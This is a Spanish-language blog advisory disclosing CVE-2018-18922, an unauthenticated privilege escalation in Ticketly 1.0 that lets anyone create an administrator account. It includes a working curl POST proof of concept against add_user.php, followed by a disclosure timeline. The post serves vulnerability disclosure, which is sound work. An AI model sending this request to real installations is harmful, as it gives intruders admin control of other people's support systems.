Hoy, publico otra entrada relacionada con vulnerabilidades en aplicaciones web, esta vez, sobre un software de ticketing llamado Ticketly 1.0 desarrollado por AbiSoft. La vulnerabilidad encontrada, permite a un atacante crearse una cuenta de administrador en el sistema mediante una vulnerabilidad de Escalación de Privilegios, la vulnerabilidad ha sido asociada al CVE-2018-18922.

 

Ticketly – CVE-2018-18922

Ticketly 1.0 – Privilege Escalation (Add Admin Account)

Ticketly 1.0, es un software de ticketing desarrollado por AbiSoft para ofrecer soporte a los usuarios sobre incidencias en los sistemas, está basado en PHP y MySQL.

📅 Vulnerabilidad descubierta por Javier Olmedo el 24/07/2018

💣 Publicada el 05/11/2018

🐛 CVE-2018-18922

🔗 Link del software Ticketly

🐞 Versión vulnerable = 1.0

 

Vector de ataque / Criticidad de la explotación

CRITICIDAD – CRÍTICA

A través de las vulnerabilidades de Escalación de Privilegios, un atacante podría obtener acceso a recursos o funciones de la aplicación de los que, normalmente, no le estaría permitido. Esto, generalmente es causado por una falla en la aplicación al comprobar los privilegios del usuario que realiza la acción o una mala configuración por parte del desarrollador/administrador sobre los privilegios previstos a los usuarios.

 

Parámetro/Recurso vulnerable

El recurso /ticketly/action/add_user.php no realiza una correcta validación de privilegios y permite a un atacante crear una cuenta de administrador sin necesidad de estar autenticado en la aplicación.

 

Puede explotarse con la siguiente petición curl:

💉 curl -i -s -k -X $’POST’ \
-H $’Host: localhost’ -H $’Content-Type: application/x-www-form-urlencoded; charset=UTF-8′ -H $’Content-Length: 82′ \
–data-binary $’name=Javier&lastname=Olmedo&email=contacto@hackpuntes.com&status=1&password=qwerty’ \
$’http://localhost/ticketly/action/add_user.php’

 

Prueba de concepto (PoC)

Timeline

24/07/2018 Descubrimiento de la vulnerabilidad

24/07/2018 Contacto con el desarrollador

24/07/2018 El desarrollador marca la vulnerabiliad como pendiente de parcheo

02/11/2018 Solicito CVE

04/11/2018 Asignación de CVE-2018-18922 por MITRE

05/11/2018 Hago pública la vulnerabilidad

 

Referencias

CVE-MITRE – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18922

 

Un saludo a todos!! 👋


Javier Olmedo

Consultor de Ciberseguridad e Investigador de Seguridad de Aplicaciones Web en mi tiempo libre, Técnico en Sistemas Informáticos y Técnico Superior en Desarrollo de Software, apasionado de la [In]Seguridad Informática.

Deja tu comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.